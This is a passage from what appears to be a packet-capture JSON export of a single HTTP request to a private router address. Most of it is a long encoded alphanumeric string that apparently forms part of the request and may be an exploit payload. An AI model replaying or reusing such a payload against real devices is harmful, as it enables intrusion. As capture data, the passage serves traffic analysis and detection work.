LfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "707"
|
||
}
|
||
}
|
||
}
|
||
}
|
||
]
|